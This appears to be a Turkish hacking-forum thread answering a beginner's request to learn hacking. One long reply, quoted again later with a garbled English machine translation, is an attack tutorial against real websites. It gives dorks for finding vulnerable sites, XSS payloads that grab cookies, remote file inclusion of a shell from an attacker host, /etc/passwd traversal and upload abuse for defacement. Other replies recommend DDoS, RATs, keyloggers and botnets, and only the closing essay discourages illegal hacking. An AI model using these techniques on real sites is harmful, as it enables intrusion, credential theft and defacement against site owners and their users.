Bana hackerlığı öğretecek birileri var mı ? (1 Viewer)

Joined
Feb 26, 2020
Credits
0
Rating - 0%
bir sürü hacking forumları var etik hacker vb o forumlardan açıklar vb gibi konuları öğrenebilirsin ve kali lenux ve termuxuda öğrenmeni tavsiye ederim
(mesela) python c++ c #f javascprit gibi bir daha çok kodlama dili
öğren sorna ise açıklara geç ve attacklara
 
Joined
Feb 25, 2020
Credits
0
Rating - 0%
Reis hackerlığı öğrenmek için bir akıl hocasına gerek yok bunun için sistemlerin nasıl işlediğini bu sistemlerin programlama dillerini öğrenmen lazım
Java, Java script, asp , html , php türü web tasarım dan başlaman lazım şuan
SQL Açığı Nedir?

Günümüzde en çok olan açıktır. SQL web sitenin veritabanıdır. SQL açığı sayesinde bir web sitede ki tüm kullanıcıları alıp ister silip isterse bir şeyler ekleyebilirsiniz. Root pass alıp web sitenin admin paneline ulaşılabilir bu açık ile

SQL Açığı Dorkları

SQL açıklı siteleri bulmak için ve ya sitenin sql açığı bulmak için mesela index.php?id=3 bunu sitenin sonuna girerseniz ve hata verirse web sitesinde SQL açığı var demektir SQL Açık Dorkları ;

Kod:
inurl:index.php?id=
Bu dorkları yazıp id değerlerini girerseniz ve hata verirse SQL açığı demektir bu açıktan faydalanıp web sitenin tüm bilgilerini ele geçirebilirsiniz.

XSS (Cross Site Scripting) Açığı Nedir?

Günümüzde büyük firmalarda bile bulunan önemli ama bir o kadar da eski bir açıktır. Açığın bulunması kolaydır.
Peki bu açıkla ne yapabilirim? Bu açık kullanıcılar siteye kayıt ve ya giriş yapınca hesap bilgileri cookieslere kaydolunur ve bu açık ile cookiesleri çekip hatta admin hesabını da çekip siteye büyük bir zarar verebilirsiniz. Bu açık manuel şekilde bulunur ve bulunması ile kapatılması çok kolaydır. XSS açığı arama , galeri , kayıt , giriş , mesajlar , haberler ve yorumlar kısımlarında enjekte edip bulabilirsiniz. Peki XSS açığı manuel olarak bulma kodu nedir?

PHP için XSS açık kodu ;

< script>alert("hacklendin")</script>

Örnek ; http://www.hedefsite.com/arama.php?=< script>alert("hacklendin")</script>

ASP için XSS açık kodu ;

">< script>alert("hacklendin")</script>

Örnek ; http://www.hedefsite.com/arama.asp?=">< script>alert("hacklendin")</script>

Cookiesleri çekmek için kod ;

< script>alert (d o c u m e n t.cookie);</script>

Not = "d o c u m e n t" arasında boşluk olmayacak şekilde yazınız



XSS Açığı Bulma Dorkları

Kod:
inurl:search.php?ID=


RFI Açığı Nedir?

Sadece PHP de olan bir açık türüdür nedenini sorarsanız RFI açığını destekleyen kodlar PHP de bulunduğu için sadece orada bulunur. Günümüzde pek yaygın olmayan ve pek fazla karşılaşılmayan bir açık türü olan RFI Remote File Include'nin kısaltılmış halidir. Türkçesi ise Uzaktan dosya çekmektir.

RFI Açığı Örnek ; index2.php dosyası:
include(“$duyurular/guncel/duyuru.php”);
Bu satırdaki “$” işareti bulunan paramtreden doğan hatalı kodlama ile uzaktan dosya çağırmak mümkündür.
http://www.hedef.com/index2.php?duyu...om/shell.txt?”
Yukarıdaki şekilde, http://saldirgan.com/shell.txt? adresinde bulunan zararlı kodlar www.hedef.com adresi üzerinde çalıştırılacaktır.

Bu aşamadan sonra shell sayesinde web siteye sızan kötü amaçlı korsan istediğini yapabilir bu aşamada genellikle en çok R57 , C99 shelleri kullanılır.


LFI Açığı Nedir?

Açılımı Local File İnclude dir siteye uzaktan dosya ekleme demektir Türkçe anlamı. LFI açığı ile bir siteye shell yükleyebilir ve ya root bilgilerini alabilirsiniz. Peki nasıl root bilgilerini alacağım? Öncelikle Mozilla Firefox'un yüklü olması lazım günümüzde fazla olmayan neredeyse bulunması imkansız gibi olan LFI açığı yakın zamanda tarihe karışabilir.


2 - Tamper Data Eklentisini yükleyelim.


Daha sonra bir LFI açığı dorkunu google yazıp bir siteye tıklıyoruz. Dorklar SQL açığı dorklarının aynısı olabilir ondan dolayı id numarasını silip yerine ../../../../../../etc/passwd
yazarsanız sitede ki rootun hesap bilgileri sizin elinize geçer.



Upload Açığı Nedir?

Upload açığı günümüzde zone kaydı kasmak için kullanılan çok basit bir açıktır. Web siteye zarar vermeyen bu açık attığınız html dosyasını sitenin dosyalarında bir yerde kaydeder ve bu linki alıp zone kaydı alıp zone kasabilirsiniz. Yapmanız gereken Google a upload açığı dorku yazarak çıkan yere html dosyanızı atıp upload butonuna tıklayıp dosyanın olduğu adrese gitmek.

Upload Açığı Dorkları

Kod:
inurl: uploadbutton.html

Bunlar örnek olarak ve en çok kaynak çıkan dorklardır tabii daha fazla dork vardır.
Örnek olarak ;

1 - Siteye girdikten sonra şu şekil bir ekran çıkıcaktır upload butonuna tıkladıktan sonra html dosyanızı atın ve çıkan linki alıp zone kaydı alın.

Reis bunlar bilindik açıklar ama bunlarla kıçı kırık siteler hackleyip zone kaydı alıcağına kodların işleyişini öğren onun dışında orta düzey ingilizcenin yanında birazda python ruby gerekli sebebi ise python ve ruby ile hata ayıklama araçları üretebilirsin ve bu şekilde sızarsın yada portları deneyebilirsin ama benim tavsiyem çok yüksek seviyede bir bilgin yoksa başkalarının yazdığı hack araçlarını kullanma çünkü neredeyse hepsinde trojan var anındda botnete yakalanırsın.


Bundan sonrası biraz daha c , c++ , c# öğrenmen lazım nede olsa c nin tüm dilleri atası , c ++ ile exploidlerin hazırlanması veya C# ile ddos için botnet arayüzü yapabilirsin bunun için ise c ve c++ plus gerekiyor bu şekilde büyük bir botnet ağı kurabilirsin.
 
Joined
Mar 22, 2020
Credits
0
Rating - 0%
Reis hackerlığı öğrenmek için bir akıl hocasına gerek yok bunun için sistemlerin nasıl işlediğini bu sistemlerin programlama dillerini öğrenmen lazım
Java, Java script, asp , html , php türü web tasarım dan başlaman lazım şuan
SQL Açığı Nedir?

Günümüzde en çok olan açıktır. SQL web sitenin veritabanıdır. SQL açığı sayesinde bir web sitede ki tüm kullanıcıları alıp ister silip isterse bir şeyler ekleyebilirsiniz. Root pass alıp web sitenin admin paneline ulaşılabilir bu açık ile

SQL Açığı Dorkları

SQL açıklı siteleri bulmak için ve ya sitenin sql açığı bulmak için mesela index.php?id=3 bunu sitenin sonuna girerseniz ve hata verirse web sitesinde SQL açığı var demektir SQL Açık Dorkları ;

Kod:
inurl:index.php?id=
Bu dorkları yazıp id değerlerini girerseniz ve hata verirse SQL açığı demektir bu açıktan faydalanıp web sitenin tüm bilgilerini ele geçirebilirsiniz.

XSS (Cross Site Scripting) Açığı Nedir?

Günümüzde büyük firmalarda bile bulunan önemli ama bir o kadar da eski bir açıktır. Açığın bulunması kolaydır.
Peki bu açıkla ne yapabilirim? Bu açık kullanıcılar siteye kayıt ve ya giriş yapınca hesap bilgileri cookieslere kaydolunur ve bu açık ile cookiesleri çekip hatta admin hesabını da çekip siteye büyük bir zarar verebilirsiniz. Bu açık manuel şekilde bulunur ve bulunması ile kapatılması çok kolaydır. XSS açığı arama , galeri , kayıt , giriş , mesajlar , haberler ve yorumlar kısımlarında enjekte edip bulabilirsiniz. Peki XSS açığı manuel olarak bulma kodu nedir?

PHP için XSS açık kodu ;

< script>alert("hacklendin")</script>

Örnek ; http://www.hedefsite.com/arama.php?=< script>alert("hacklendin")</script>

ASP için XSS açık kodu ;

">< script>alert("hacklendin")</script>

Örnek ; http://www.hedefsite.com/arama.asp?=">< script>alert("hacklendin")</script>

Cookiesleri çekmek için kod ;

< script>alert (d o c u m e n t.cookie);</script>

Not = "d o c u m e n t" arasında boşluk olmayacak şekilde yazınız



XSS Açığı Bulma Dorkları

Kod:
inurl:search.php?ID=



RFI Açığı Nedir?

Sadece PHP de olan bir açık türüdür nedenini sorarsanız RFI açığını destekleyen kodlar PHP de bulunduğu için sadece orada bulunur. Günümüzde pek yaygın olmayan ve pek fazla karşılaşılmayan bir açık türü olan RFI Remote File Include'nin kısaltılmış halidir. Türkçesi ise Uzaktan dosya çekmektir.

RFI Açığı Örnek ; index2.php dosyası:
include(“$duyurular/guncel/duyuru.php”);
Bu satırdaki “$” işareti bulunan paramtreden doğan hatalı kodlama ile uzaktan dosya çağırmak mümkündür.
http://www.hedef.com/index2.php?duyu...om/shell.txt?”
Yukarıdaki şekilde, http://saldirgan.com/shell.txt? adresinde bulunan zararlı kodlar www.hedef.com adresi üzerinde çalıştırılacaktır.

Bu aşamadan sonra shell sayesinde web siteye sızan kötü amaçlı korsan istediğini yapabilir bu aşamada genellikle en çok R57 , C99 shelleri kullanılır.


LFI Açığı Nedir?

Açılımı Local File İnclude dir siteye uzaktan dosya ekleme demektir Türkçe anlamı. LFI açığı ile bir siteye shell yükleyebilir ve ya root bilgilerini alabilirsiniz. Peki nasıl root bilgilerini alacağım? Öncelikle Mozilla Firefox'un yüklü olması lazım günümüzde fazla olmayan neredeyse bulunması imkansız gibi olan LFI açığı yakın zamanda tarihe karışabilir.


2 - Tamper Data Eklentisini yükleyelim.


Daha sonra bir LFI açığı dorkunu google yazıp bir siteye tıklıyoruz. Dorklar SQL açığı dorklarının aynısı olabilir ondan dolayı id numarasını silip yerine ../../../../../../etc/passwd
yazarsanız sitede ki rootun hesap bilgileri sizin elinize geçer.



Upload Açığı Nedir?

Upload açığı günümüzde zone kaydı kasmak için kullanılan çok basit bir açıktır. Web siteye zarar vermeyen bu açık attığınız html dosyasını sitenin dosyalarında bir yerde kaydeder ve bu linki alıp zone kaydı alıp zone kasabilirsiniz. Yapmanız gereken Google a upload açığı dorku yazarak çıkan yere html dosyanızı atıp upload butonuna tıklayıp dosyanın olduğu adrese gitmek.

Upload Açığı Dorkları

Kod:
inurl: uploadbutton.html

Bunlar örnek olarak ve en çok kaynak çıkan dorklardır tabii daha fazla dork vardır.
Örnek olarak ;

1 - Siteye girdikten sonra şu şekil bir ekran çıkıcaktır upload butonuna tıkladıktan sonra html dosyanızı atın ve çıkan linki alıp zone kaydı alın.

Reis, these are familiar, but you can learn how to code the hack sites and get a zone record with them. Apart from that, you can produce debugging tools with python and ruby besides the middle level English, and you can leak or try the ports, but my advice is at a very high level. If you don't know, don't use the hacking tools written by others because almost all of them have trojans and you will get botnets.


After that, you have to learn a little more c, c ++, c #, you can make an ancestor for all languages of c, prepare exploids with c ++ or create a botnet interface for C # and ddos.
[/ QUOTE]
Wow they seems easy but then hard work
 
Joined
Feb 29, 2020
Credits
8
Rating - 0%
Proram Dillerini Çok iyi bilmediğim için ben bile kendimi hacker olarak görmüyorum. bir kaç dork bilmek veya sql açıklı siteye sqlmap ile dalmak bence hackerlik değil. başlanğıç ilk olarak sana tavsiyem program dillerini ögrenmen. ben mesela ezbere iş yaparım. denneme yanılma ile. ilk başlağım zamanlarda. 3 saat pes etmeden siteyi hacklemeyi falan deniyordum. bu çıktığın yolda başarılar dilerim.
 

ROWDY

Kartallar Yalnız Uçar. 🦅🚬
Joined
Nov 16, 2019
Credits
0
Rating - 0%
Proram Dillerini Çok iyi bilmediğim için ben bile kendimi hacker olarak görmüyorum. bir kaç dork bilmek veya sql açıklı siteye sqlmap ile dalmak bence hackerlik değil. başlanğıç ilk olarak sana tavsiyem program dillerini ögrenmen. ben mesela ezbere iş yaparım. denneme yanılma ile. ilk başlağım zamanlarda. 3 saat pes etmeden siteyi hacklemeyi falan deniyordum. bu çıktığın yolda başarılar dilerim.
Ddos rat keylogger gibi kolay windows hacklerinden başla
 

Ghost Killer

D E F A C E R
Joined
Mar 15, 2020
Credits
5
Rating - 0%
Hacker kelimesi gerçekten üstün hack başarısına sahip kişilere denir. Bunun için çok çalışmak ve çok tecrübe edinmek gerekir. Yazılım ve bilgisayar alanı da dahilinde daha pek çok konuda profesyonel olman lazım.

İyi Forumlar
 
Joined
Sep 1, 2018
Credits
55
Rating - 0%
şöyle buyur

Bu yazıyı okuduğunuza göre muhtemelen "Ne yapsam da, ne etsem şu hackerlığa başlasam?" gibi soruları kendinize
soranlardansınızdır. Ancak hackerlığa nerden başlanacağı hakkında konuşmadan önce şu soruyu kendinize sorun; "Neden Hacker olmak istiyorum?" Aldı başını bi hackerlık hevesi ama nereye varacak bunun sonu? Eline bir mouse, bir klavye geçen "Hackerııııım" diye bağırıyo.

Neden hacker olmak istiyorsunuz?
Hedefiniz nedir?
En yakın arkadaşınız bilgisayarınız mı?
Bilgisayara sadece hafta sonlarımı vakit ayırabiliyosunuz?

Bunları iyice bir düşünün. Birinin bilgisayarına trojanla
girmekle hacker olunmaz. Bilgisayarın her bir şeyini bilmek zorundasınız. Bilgisayarla yatıp bilgisayarla kalkmalısınız. Hatta yatmamalısınız bile. Yatmadan, uyumadan bilgisayarla uğraşmalısınız. Arkadaşlarınız sinemaya, cafeye giderken siz bilgisayarla uğraşmalısınız. Açın bilgisayarınızın kasasını!!! Takın çıkarın zerzavatları, arkadaşlarınızla değişin, bozun,
kırın (zevk olsun diye değil, yanlışlıkla kırılabilir ), donanımlarınızın kitapçıklarını okuyun. Hahh evet!! En önemli olay okumak! Her bi Şeyi okuyun. Önemli bir şey de İngilizce! İngilizceniz süper olmalı. Hatta bir kaç dil daha bilip olayı abartın!! Çünkü en önemli kaynaklar İngilizcedir.

Okuduklarınızı uygulayın, hep okumakla da hacker olunmaz. Ufaktan, ufaktan ilerleteceksin. Masanda bi kolonya hatta masanın altında bir kova suyla havlu bulundur! Kafayı yemek üzere olduğunu anlarsan hemen bunları kullan.

Bir de herşeyini gizli tut. Arkadaşlarına gidip "Heheh! dün elemanın birinin bilgisayarına girip, şifrelerini çaldım!" gibi bile muhabbetler etme. Sana gıcık olan biri olayı ispiyonlayabilir.

Haaa tabii bir de hack olayını zarar verici şekilde kullanmıyorsun. Neyse işin genel hali bu!

Gelelim teknik ayrıntılara.

Öncelikle gidip "Programlama Dillerine Gönül Verenler" derneğine (böyle bir dernek kurulursa bana da haber verin) üye olup c/c++/perl/php/java/delphi/visual basic gibi programla dillerinden öğreniyorsun. Sonra kendini windows NT,2000/Linux/Unix gibi işletim sistemlerinden birine adapte edip bu işletim sistemini de avcunun içi gibi öğreniyosun. Günde en az yarım saatini bilgisayar bilgini geliştirmeye ayıramıyorsan hack işini unut!

Aşağıdaki üç tip hacker da detaylı sistem güvenliği ve programlama bilgisine sahiptir. Ancak onları birbirlerinden farklı kılan, bilgilerini nasıl kullandıklarıdır.

1. Black - hat hackerlar (cracker olarak da bilinirler) Virüs yazarlar, deneme sürümü programların deneme zamanlarını kıran progr*****lar yaparlar, bilgi kaybına sebep olurlar, websitelerini kırarak yasadışı işler için kullanırlar. Genellikle verdikleri zarardan ötürü uzun süreli hapis cezasına çarptırılırlar.

2. Grey - hat hackerlar arada bir yaptıkları muzipliklerden büyük kaoslara neden olabilirler, ve bunun zararlı olduğunu idrak etmeye başladıklarında kelepçeyi bileklerinde hissedebilirler.

3. White - hat hackerlar hackingin soylu şovalyeleridir. Bilgilerini iyilik için kullanırlar. Programlarda hata bulduklarında diğer white - hat hackerlarla çalışarak sorunun kaynağına inerler. Yaptıklarının sonunda iyi maaşlı network adminliğine, programcılığa yada güvenlik danışmanlığına getirilirler.

Şimdi hacker olmaya geri dönelim...

Bir işletim sistemini ve/veya programlamayı iyice öğrendikten sonra exploitlerin nasıl çalıştığını anlıycaksınız. Exploitleri iyice anladıktan sonra artık bilgilerinizi yavaş yavaş birleştirerek sisteminizi yada programınızı crackerlardan koruyabileceksiniz.

HDC diye bi şey varmış tammam mı.. (Yazının ingilizce (orjinal) versiyonun sahibi) O'na şu şekilde sorular sormayacakmışsınız! (Allah Alllaaaaaah);

"Merhaba HDC, kız arkadaşımın maillarını okumak için hotmail'i nasıl kırabilirim? Sanırım beni aldatıyor. Lütfen yardım edin!!!"

Bu kabul edilir bir soru değilmişşşşşşş!!! çünküüü:

1. Başkalarının hesaplarını veya sistemlerini kırmak yasadışıdır, hapse girebilirsiniz.

2. Kimse hesabının kırılmasını istemezmişş ve onlar bizim için bunu yapmazlarmışşş.



Bir de sormak içi güzel bir soru örneği:
"Merhaba HDC, şifre bazlı kullanıcı kabul sistemleri hakkında çalışıyorum. Daha iyi anlamam için ortak dizayn açıklarından bahsedebilirmisiniz?"


Bu kabul edilebilir, iyi bir soruymuşşşşş. Çünküüü:

1. Burda zamanını bilgisayar bilgini geliştirmek için harcadığını gösteriyorsun

2. Yasadışı bir konu hakkında konuşmuyorsun.



Lamer'in de ne olduğunu bilmelisiniz. Böylece dalga geçilmekten, milletin neşe kaynağı olmaktan ve forumlardan falan atılmaktan kurtulursunuz. Kimse lamerler ile uğraşmak istemez. Siz de bu lame davranışlardan sakının.

Bir lamer, hacker değildir.

1. Başkalarından, verdikleri e-mail hesaplarını veya web sitelerini kırmalarını isteyen

2. Sub7 yada Back Office hakkında konuşan

3.Bir çok soru sorup, hiç bir yazı, kitap okumayan, kendi çalışmayan

4. Hiç bir nedeni olmadan başkalarından yasadışı iş yapmasını isteyen

...kişiler "Lamer"dir

Teknoloji gün geçtikçe ilerliyor ve güncel kalmak hacker olmak için çok önemlidir. Hack, teknoloji haberlerini takip edin ve birşeyler yapmaya çalışın!


Sonuç olarak özetle:

1. Bir işletim sisteminde uzman olun
2. En az bir programlama dili öğrenin
3. Tcp/Ip, Ethernet, FDDI gibi network teknolojilerini öğrenin.
4. Exploitlerin nasıl çalıştığını öğrenin
5. Lamer davranışlardan sakının
6. Yazıları okuyun, çok soru sorun ve öğrenmekten vazgeçmeyin
 

Users who are viewing this thread

Top